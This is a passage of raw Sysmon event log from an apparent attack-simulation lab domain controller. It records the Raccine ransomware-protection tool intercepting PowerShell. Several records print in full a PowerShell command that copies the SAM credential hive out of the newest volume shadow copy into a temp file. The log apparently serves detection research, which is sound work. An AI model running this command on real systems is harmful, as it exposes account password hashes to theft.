Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165162Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.051{9DBE88B5-3BBF-61B2-8305-010000000E02}78525916C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBF-61B2-8405-010000000E02}7620C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+57ef|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x80000000000000002165161Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.048{9DBE88B5-3BBF-61B2-8305-010000000E02}7852ATTACKRANGE\AdministratorC:\Program Files\Raccine\Raccine.exeC:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac10A6.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002165160Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.042{9DBE88B5-3BBF-61B2-8305-010000000E02}78525916C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBF-61B2-8405-010000000E02}7620C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1c3aC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+c6f00|C:\Windows\System32\KERNELBASE.dll+c6e21|C:\Program Files\Raccine\Raccine.exe+1876|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165154Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.041{9DBE88B5-3BBF-61B2-8305-010000000E02}78525916C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBF-61B2-8405-010000000E02}7620C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+1848|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002165153Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.041{9DBE88B5-3BBF-61B2-8405-010000000E02}7620C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" $mydump = $ENV:temp + '\' + 'myhive' [System.IO.File]::Copy($shadowpath , $mydump)} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" $mydump = $ENV:temp + '\' + 'myhive' [System.IO.File]::Copy($shadowpath , $mydump)} 10341000x80000000000000002165152Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.032{9DBE88B5-3AAE-61AE-0EA8-000000000E02}68046848C:\Windows\system32\conhost.exe{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165151Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.030{9DBE88B5-3AAE-61AE-0DA8-000000000E02}67766968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c01f5|UNKNOWN(00007FF9867AB323) 10341000x80000000000000002165146Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.027{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002165145Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.027{9DBE88B5-3AAE-61AE-0DA8-000000000E02}67766968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\207926782604047fb43c0980a31be783\Microsoft.PowerShell.Commands.Management.ni.dll+8657f278(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\207926782604047fb43c0980a31be783\Microsoft.PowerShell.Commands.Management.ni.dll+8657f278(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\207926782604047fb43c0980a31be783\Microsoft.PowerShell.Commands.Management.ni.dll+8657f278(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\207926782604047fb43c0980a31be783\Microsoft.PowerShell.Commands.Management.ni.dll+8657f278(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e2995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e27fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c986b92d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97daa82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca2ab304(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97a002a(wow64)|UNKNOWN(00007FF9867DC5C8) 154100x80000000000000002165144Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.027{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe1.4.2.0 BETAA Simple Ransomware Vaccine - see https://github.com/Neo23x0/RaccineRaccineRaccineRaccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" $mydump = $ENV:temp + '\' + 'myhive' [System.IO.File]::Copy($shadowpath , $mydump)} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=287F6CFBFFD83B75A0F8F749B0F636F3,SHA256=E5364CE4BD1814E003215BFF10DD2F191C33199260DFD2688D4F6CCE4A7C75B8,IMPHASH=B9673CBFF2550CFBFA1668EF53412C24{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x80000000000000002165111Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:14.518{9DBE88B5-3A90-61AE-E7A7-000000000E02}48444132C:\Windows\system32\taskhostw.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165110Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:14.516{9DBE88B5-3A90-61AE-E7A7-000000000E02}48444132C:\Windows\system32\taskhostw.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165109Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:14.515{9DBE88B5-2F14-61B2-9603-010000000E02}80647708C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6165f|C:\Windows\System32\SHELL32.dll+62a85|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165108Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:14.515{9DBE88B5-2F14-61B2-9603-010000000E02}80647708C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6299e|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165107Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:14.515{9DBE88B5-2F14-61B2-9603-010000000E02}80647708C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618b4|C:\Windows\System32\SHELL32.dll+62967|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165106Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:14.514{9DBE88B5-2F14-61B2-9603-010000000E02}80647708C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\explorer.exe+1f054|C:\Windows\explorer.exe+1f000|C:\Windows\explorer.exe+1dfec|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165100Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:14.467{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002165085Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:14.459{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002165019Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:14.420{9DBE88B5-C32E-61A8-0C00-000000000E02}8485240C:\Windows\system32\svchost.exe{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165017Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:14.414{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002165002Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:14.406{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002164936Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:14.364{9DBE88B5-C32E-61A8-0C00-000000000E02}8485240C:\Windows\system32\svchost.exe{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164935Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:14.364{9DBE88B5-3BBC-61B2-6805-010000000E02}57644776C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+1e7b|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164933Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:14.358{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002164918Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:14.351{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002164852Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:14.305{9DBE88B5-C32E-61A8-0C00-000000000E02}8485240C:\Windows\system32\svchost.exe{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program 